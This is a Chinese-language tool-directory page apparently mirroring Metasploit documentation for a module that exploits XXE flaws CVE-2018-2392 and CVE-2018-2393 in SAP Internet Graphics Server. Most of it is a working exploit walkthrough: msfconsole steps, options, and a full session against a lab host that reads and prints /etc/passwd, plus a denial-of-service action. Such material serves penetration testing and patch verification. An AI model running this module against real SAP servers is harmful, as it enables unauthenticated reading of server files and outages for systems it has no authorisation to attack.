Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
sap_igs_xxe — SAP IGS XXE 攻击 CVE-2018-2392 和 CVE-2018-2393 | Kitploit
工具/GitHubGitHub/vladimir-ivanov-git/sap_igs_xxe
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubvladimir-ivanov-git/sap_igs_xxe

sap_igs_xxe

SAP IGS XXE 攻击 CVE-2018-2392 和 CVE-2018-2393

查看仓库
15年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

SAP IGS XXE 攻击 CVE-2018-2392 和 CVE-2018-2393

Metasploit Framework 中的此模块

文档

模块

易受攻击的应用程序

该模块利用了 CVE-2018-2392 和 CVE-2018-2393,这是 SAP Internet Graphics Servers (IGS) 运行版本 7.20、7.20EXT、7.45、7.49 或 7.53 的 XMLCHART 页面中的两个 XXE 漏洞。这些漏洞是由于在向 XMLCHART 页面提交 POST 请求以生成新图表时,未对 Extension HTML 标签进行适当验证而导致的。

成功利用将允许未经身份验证的远程攻击者从服务器读取文件,权限为启动 IGS 服务的用户,通常是 SAP 管理员用户。或者,攻击者也可以利用该 XXE 漏洞对易受攻击的 SAP IGS 服务器进行拒绝服务攻击。

应用程序背景

Internet Graphics Services (IGS) 提供了一种基础设施,使开发人员能够以最小的努力在互联网浏览器中显示图形。它已集成到多种不同的 SAP UI 技术中,允许利用来自其他 SAP 系统或数据源的数据来生成动态图形或非图形输出。

安装步骤

在线可以找到安装和更新 SAP IGS 服务器的步骤,请参见此页面。有关配置 IGS 服务器的更多信息,请参见此处。最后,有关管理 IGS 服务器的信息,请参见此处。

一旦设置并配置完成,实例将在默认 HTTP 端口 40080 上变得易受攻击。

验证步骤

  1. 启动 msfconsole
  2. 执行:workspace [WORKSPACE]
  3. 执行:use auxiliary/admin/sap/sap_igs_xmlchart_xxe
  4. 执行:set RHOSTS [IP]
  5. 执行:set FILE [远程文件名]
  6. 执行:set action READ
  7. 执行:check
  8. 验证 check 方法是否正确识别目标是否易受攻击。
  9. 执行:run
  10. 验证返回了您指定的文件内容。

选项

FILE

要从远程服务器读取的文件。示例:/etc/passwd

URIPATH

这是 SAP IGS 服务器中易受 XXE 攻击的 XMLCHART 页面的路径。默认设置为 /XMLCHART,但如果 SAP IGS 服务器安装在 web 根目录下的不同路径,则可以更改。例如,如果 SAP IGS 服务器安装在 web 根目录下的 /igs/ 路径中,则该值应设置为 /igs/XMLCHART。

动作

root@kitploit:~
   名称  描述
   ----  -----------
   READ  远程文件读取
   DOS   拒绝服务

场景

易受攻击的 SAP IGS 版本:7.45,运行于 SUSE Linux Enterprise Server for SAP Applications 12 SP1

root@kitploit:~
msf6 > workspace -a SAP_TEST
[*] 添加的工作区:SAP_TEST
[*] 工作区:SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
RHOSTS => 172.16.30.29
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options

模块选项 (auxiliary/admin/sap/sap_igs_xmlchart_xxe):

   名称              当前设置              必需   描述
   ----              ---------------      --------  -----------
   FILE              /etc/passwd          no        要从远程服务器读取的文件
   Proxies           http:127.0.0.1:8080  no        格式为 type:host:port[,type:host:port][...] 的代理链
   RHOSTS            172.16.30.29         yes       目标主机,范围 CIDR 标识符,或语法为 'file:<path>' 的主机文件
   RPORT             40080                yes       目标端口 (TCP)
   SSL               false                no        为传出连接协商 SSL/TLS
   URIPATH           /XMLCHART            yes       从 web 根目录到 SAP IGS XMLCHART 页面的路径
   VHOST                                   no        HTTP 服务器虚拟主机


辅助动作:

   名称  描述
   ----  -----------
   READ  远程文件读取


msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
[+] 172.16.30.29:40080 - 目标易受攻击。运行操作系统:SUSE Linux Enterprise Server for SAP Applications 12 SP1 的 172.16.30.29 返回的响应表明其 XMLCHART 页面容易受到 XXE 攻击!
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
[*] 正在针对 172.16.30.29 运行模块

[+] 来自主机 172.16.30.29 的文件:/etc/passwd 内容
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
admin:x:1000:100:admin:/home/admin:/bin/bash
j45adm:x:1001:1001:SAP System Administrator:/home/j45adm:/bin/csh
sybj45:x:1002:1001:SAP Database Administrator:/sybase/J45:/bin/csh
sapadm:x:1003:1001:SAP System Administrator:/home/sapadm:/bin/false
[+] 文件:/etc/passwd 已保存至:/Users/vladimir/.msf4/loot/20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
[*] 辅助模块执行完成
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services

服务
======

host          port   proto  name  state  info
----          ----   -----  ----  -----  ----
172.16.30.29  40080  tcp    http  open   SAP Internet Graphics Server (IGS)

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns

漏洞
========

时间戳                  主机              名称                                            参考
---------                ----              ----                                             ----------
2020-10-07 10:12:37 UTC  172.16.30.29      SAP Internet Graphics Server (IGS) XMLCHART XXE  CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot

战利品
====

host          service  type              name         content     info                  path
----          -------  ----              ----         -------     ----                  ----
172.16.30.29           igs.xmlchart.xxe  /etc/passwd  text/plain  SAP IGS XMLCHART XXE  /Users/vladimir/.msf4/loot/01619fd331da98b5ac4d-20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt

Burp 中的 HTTP 检查请求

Burp 中的 HTTP 检查请求

Burp 中获取远程 /etc/passwd 文件的第一个 HTTP 请求

Burp 中获取远程 /etc/passwd 文件的第一个 HTTP 请求

Burp 中获取远程 /etc/passwd 文件的第二个 HTTP 请求

Burp 中获取远程 /etc/passwd 文件的第二个 HTTP 请求

演示视频

演示视频

下载工具